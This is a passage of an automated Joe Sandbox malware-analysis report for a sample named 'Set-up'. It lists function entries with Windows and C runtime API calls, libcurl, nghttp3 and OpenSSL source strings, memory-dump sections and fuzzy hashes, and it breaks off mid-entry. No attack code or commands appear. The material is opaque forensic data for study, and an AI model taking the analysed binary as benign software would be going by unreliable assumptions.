                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcpystrlen$memcpymemset
                                    • String ID: copy_integer$crypto/params.c$unsigned_from_signed
                                    • API String ID: 2323844366-3781254518
                                    • Opcode ID: e54125977a62c3a15b4992faa0777fb980c441a29209bbc920f9ade5a76f7329
                                    • Instruction ID: 854271467f61a6cc3af6f824fd1352fbc10190e540ef572fd40e9561535a17e4
                                    • Opcode Fuzzy Hash: e54125977a62c3a15b4992faa0777fb980c441a29209bbc920f9ade5a76f7329
                                    • Instruction Fuzzy Hash: 8E016DE5B8931076E23072657C0BF6B3B88CBD1B48F142439F644B71C2F1956C948262
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0121981C,nghttp3_qpack.c,00000811,?,?), ref: 00D2E866
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,00D3077F,?,?,00000000,00000000), ref: 00D2E87B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
                                    • API String ID: 1222420520-1270044496
                                    • Opcode ID: b578816020b5b14538e93ec030189ee298bb8922e7aabac46788ef097340a715
                                    • Instruction ID: 65473b5ab294341ea96fb79496916d35f1664df23547c587897dd22906957933
                                    • Opcode Fuzzy Hash: b578816020b5b14538e93ec030189ee298bb8922e7aabac46788ef097340a715
                                    • Instruction Fuzzy Hash: DD8192B5A006119FD720DF24E842A26B7F5FFA531CF08862CE88997712E731F855CBA1
                                    APIs
                                    • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00C854E6), ref: 00C88235
                                    • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 00C882D4
                                    • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 00C882E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strrchr$_stat64
                                    • String ID: mime.c
                                    • API String ID: 2771713950-3378952128
                                    • Opcode ID: 56d606160986a244d172c7ac245009614ed9c811f974f9a98ae06508dc5a551b
                                    • Instruction ID: d5f1cd359a031879d257e3f51f5674582b96730c644b009a6b9b145ae9ba8827
                                    • Opcode Fuzzy Hash: 56d606160986a244d172c7ac245009614ed9c811f974f9a98ae06508dc5a551b
                                    • Instruction Fuzzy Hash: 1C5126B1A007009BEB14AF25CC867677694AF40B19F440238FD18DF2D6FBB5D9099B99
                                    APIs
                                    • htons.WS2_32(?), ref: 00CC43D8
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CC4409
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00CC4457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: htonsmemcpystrlen
                                    • String ID: curl_addrinfo.c
                                    • API String ID: 2973076469-1838508774
                                    • Opcode ID: d769a3743d7c922bdd91b596e5f6e711331fad0138e8c103eec27619d26f9898
                                    • Instruction ID: 4d0b1f0d91caa57926137fde87c1ce2a111d59d1c9029a4c287532c33238874c
                                    • Opcode Fuzzy Hash: d769a3743d7c922bdd91b596e5f6e711331fad0138e8c103eec27619d26f9898
                                    • Instruction Fuzzy Hash: 114178B5A04745AFD704DF55C480B6AB7E4FF88314F18CA6DED998B251E330EA90CB91
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00CB665D
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CB670E
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 00CB671C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$_time64
                                    • String ID: altsvc.c
                                    • API String ID: 2413861649-3234676706
                                    • Opcode ID: 733b922c403e71fb369cdc9af501b5a59be44d5c74a91299cb142d653241c39f
                                    • Instruction ID: 803fb5f5f4df2f902901f692aca040d88a67f3ce2d50c771c41fbc944b2fd051
                                    • Opcode Fuzzy Hash: 733b922c403e71fb369cdc9af501b5a59be44d5c74a91299cb142d653241c39f
                                    • Instruction Fuzzy Hash: 5B3104F2E043016BDB00AE21EC82A6B7BD4AB94748F14453CFD5DA6242F775EE04D792
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00D2435F
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 00D243EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                    • API String ID: 1222420520-4133914617
                                    • Opcode ID: e99475538a4529420f0f01d346fd1da4eda5c12d68ad1e0f0f6ff409df1df00d
                                    • Instruction ID: 4c7f75e135075534fe255aad4322b3aabd1f0026345a82e509ce23f67673d236
                                    • Opcode Fuzzy Hash: e99475538a4529420f0f01d346fd1da4eda5c12d68ad1e0f0f6ff409df1df00d
                                    • Instruction Fuzzy Hash: A931D272540265AFD7119F18FC09F9A77E9EFA5319F0904B8E8049B163E772E828C771
                                    APIs
                                    • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,00D270DF,00000001,?,?,?), ref: 00D2A0E5
                                      • Part of subcall function 00D2A140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00D2A29A
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,00D270DF,00000001,?,?,?), ref: 00D2A135
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assertmemcpymemmove
                                    • String ID: ksl->head$nghttp3_ksl.c
                                    • API String ID: 374949274-2784241221
                                    • Opcode ID: 6c2916c9fbafb63b97c21e0c3b32b794c2ceb28c0a1f951b89e9fc9cdec1b898
                                    • Instruction ID: fb5f6bce4984cd5e311b99cab0b45b6417996828d16876153094aa705689c861
                                    • Opcode Fuzzy Hash: 6c2916c9fbafb63b97c21e0c3b32b794c2ceb28c0a1f951b89e9fc9cdec1b898
                                    • Instruction Fuzzy Hash: C61181702003119FDB159F08E98195AF7A6FFD5328F1CC55EE8498B645D334EC50CBA2
                                    APIs
                                    • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00CB893B
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00CB8960
                                      • Part of subcall function 00CA7620: GetModuleHandleA.KERNEL32(ntdll), ref: 00CA763F
                                      • Part of subcall function 00CA7620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00CA764B
                                      • Part of subcall function 00CA7620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00CA7695
                                      • Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 00CA76D3
                                      • Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 00CA76DA
                                      • Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 00CA76E4
                                      • Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00CA76EB
                                      • Part of subcall function 00CA7620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00CA76FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
                                    • String ID: @$ @
                                    • API String ID: 2103437208-1089145642
                                    • Opcode ID: fe0bfd7e968a432fcff498ab995c9b45f7568e920007f753ea7aca11dd4505ca
                                    • Instruction ID: 71a9a3d8712bb3af147bf059076d35f04c0a768ce72b43df84feef6169b4c589
                                    • Opcode Fuzzy Hash: fe0bfd7e968a432fcff498ab995c9b45f7568e920007f753ea7aca11dd4505ca
                                    • Instruction Fuzzy Hash: 3A01B9B0508342ABEB20AF14E94A7BA77ECAF41705F054528F984563C9EBB5DAC8C743
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00DA8A9A
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00DA8AEA
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DA8BD7
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00DA8C2B
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00DA8E63
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: a0d36bb5d9c1acb87fcf4868d6289c91cedc037550d3fa296a52a41ebb4ac15c
                                    • Instruction ID: 656aad234cac0a6c3680fd298a9c6d5cf42e95b2a3a764cb161a9c40d59b9423
                                    • Opcode Fuzzy Hash: a0d36bb5d9c1acb87fcf4868d6289c91cedc037550d3fa296a52a41ebb4ac15c
                                    • Instruction Fuzzy Hash: E1F1BDB2A01611CFDB18CF18C59075ABBE2FF9A310F18C56DE8498B395DB35E854DBA0
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00FF2B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: b6dc696a9d249f7b9c8de163081ef89231b82f59aaf832f97f0eeaf5d82f5464
                                    • Instruction ID: b56caa1b295a052fb534e10bf65a5d5a8d50ccfe17bf6b5d53d9d99892d4ea46
                                    • Opcode Fuzzy Hash: b6dc696a9d249f7b9c8de163081ef89231b82f59aaf832f97f0eeaf5d82f5464
                                    • Instruction Fuzzy Hash: A3B17C72A042099FCB54CF28C884AAE7BE5BF88314F19862DFD5997365D770EC40AB81
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00CAC685
                                      • Part of subcall function 00C873F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00C8CA95,011F8138,00000467,mprintf.c), ref: 00C8741D
                                      • Part of subcall function 00C873F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00C87445
                                      • Part of subcall function 00C873F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00C8CA95,011F8138,00000467,mprintf.c), ref: 00C87486
                                      • Part of subcall function 00C873F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C874AA
                                      • Part of subcall function 00C873F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C874B2
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00CAC6CF
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00CAC719
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy$__acrt_iob_func_errnofflushstrlen
                                    • String ID: vtls/vtls.c
                                    • API String ID: 1294796744-169717415
                                    • Opcode ID: b4aaf3ad7b1b96075f7d8f26d60089a72f62c1d3169d5e467eccfd75c90fd34f
                                    • Instruction ID: 49ac9320e4395bac3a989e458c172f9b9332facd03656b67436a1493e7fa1507
